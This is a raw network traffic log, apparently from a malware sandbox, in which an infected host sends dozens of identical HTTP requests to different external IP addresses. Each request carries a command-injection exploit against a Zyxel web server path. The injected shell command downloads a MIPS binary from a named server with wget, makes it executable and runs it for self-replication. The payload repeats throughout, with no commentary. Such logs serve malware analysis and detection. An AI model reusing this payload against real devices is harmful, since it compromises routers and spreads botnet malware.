                                      Jan 19, 2024 17:29:37.881849051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5689192.168.2.1435452130.92.188.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881902933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5690192.168.2.145174863.135.20.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881925106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5691192.168.2.1459206197.185.79.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881970882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5692192.168.2.144830076.252.129.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882011890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5693192.168.2.1452642111.140.61.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882072926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5694192.168.2.1455612200.0.143.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882112026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5695192.168.2.1458170101.99.41.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882148981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5696192.168.2.1443358100.222.148.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882177114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5697192.168.2.1460360159.56.235.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882215023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5698192.168.2.1439578195.246.63.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882247925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5699192.168.2.143420875.8.61.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882303953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5700192.168.2.1436632109.8.208.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882360935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5701192.168.2.1448614198.89.119.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882384062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5702192.168.2.143309869.101.113.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882432938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5703192.168.2.1437334136.240.214.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882464886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5704192.168.2.144863814.228.71.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882488966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5705192.168.2.145167284.188.200.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882560015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5706192.168.2.1436442109.83.75.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882565022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5707192.168.2.143368837.105.16.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882611990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5708192.168.2.144754066.167.64.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882627010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5709192.168.2.1441884133.78.31.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882662058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5710192.168.2.144529646.237.176.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882716894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5711192.168.2.1453516217.183.203.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882761955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5712192.168.2.143934262.47.99.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882798910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5713192.168.2.143299651.202.213.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882838011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5714192.168.2.1443886126.223.87.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882869959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5715192.168.2.1453230158.237.132.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882916927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5716192.168.2.145543847.44.129.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882950068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5717192.168.2.1443554210.218.79.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.882989883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5718192.168.2.1438554134.65.158.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883022070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5719192.168.2.1459956186.59.99.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883071899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5720192.168.2.143661647.95.160.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883122921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5721192.168.2.145272870.83.200.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883152962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5722192.168.2.1459228130.8.165.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883222103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5723192.168.2.145231298.44.101.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883240938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5724192.168.2.1448330188.50.134.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883280039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5725192.168.2.1447462116.109.152.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883310080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5726192.168.2.1434134173.118.144.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883341074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5727192.168.2.1450034111.176.245.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883389950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5728192.168.2.1454784113.131.7.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883443117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5729192.168.2.144824649.120.199.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883476019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5730192.168.2.1456992219.85.2.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883491993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5731192.168.2.14570269.212.222.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883547068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5732192.168.2.1437696181.233.234.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883578062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5733192.168.2.143370035.17.110.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883626938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5734192.168.2.144836254.173.228.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883656979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5735192.168.2.1448502210.113.255.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883694887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5736192.168.2.145828086.118.70.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883716106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5737192.168.2.1434664190.80.158.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883788109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5738192.168.2.146018098.87.215.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883812904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5739192.168.2.144899438.138.216.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883837938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5740192.168.2.145373497.122.27.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883891106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5741192.168.2.1456870199.213.61.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883934975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5742192.168.2.1443676165.176.36.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.883970976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5743192.168.2.144747219.75.205.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884005070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5744192.168.2.146087489.225.48.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884037971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5745192.168.2.1446406120.64.122.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884077072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5746192.168.2.1452574126.155.180.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884123087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5747192.168.2.1449428151.10.95.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884155035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5748192.168.2.1438016117.142.105.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884198904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5749192.168.2.1442182212.175.123.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884219885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5750192.168.2.144489465.218.149.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884268045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5751192.168.2.1454200137.122.233.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884311914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5752192.168.2.1449370181.254.239.200443
                                      TimestampBytes transferredDirectionData
